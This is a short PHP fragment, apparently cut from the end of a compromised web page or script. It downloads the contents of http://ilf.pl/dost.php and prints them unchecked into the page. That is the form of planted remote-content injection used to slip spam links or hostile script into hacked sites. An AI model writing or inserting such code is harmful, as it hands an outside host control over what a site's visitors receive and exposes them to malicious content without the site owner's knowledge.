$adr="http://ilf.pl/dost.php"; if(function_exists('file_get_contents')){ $RL=file_get_contents($adr); }else{ $url=fopen($adr,"r"); while($buff=fread($url,512))$RL.=$buff; fclose($url); } echo $RL; ?>